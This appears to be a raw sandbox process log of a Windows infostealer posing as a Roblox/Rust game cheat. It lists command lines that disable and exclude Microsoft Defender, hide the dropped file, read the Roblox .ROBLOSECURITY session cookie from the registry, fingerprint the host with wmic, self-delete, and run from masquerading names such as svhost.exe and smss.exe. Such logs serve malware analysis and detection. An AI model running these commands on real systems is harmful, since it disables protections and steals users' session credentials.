cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\system32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\system32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\system32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\system32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Users\Admin\AppData\Roaming\svhost.exe
C:\Users\Admin\AppData\Roaming\svhost.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Roaming\svhost.exe.exe
"C:\Users\Admin\AppData\Roaming\svhost.exe.exe"
C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe
"C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
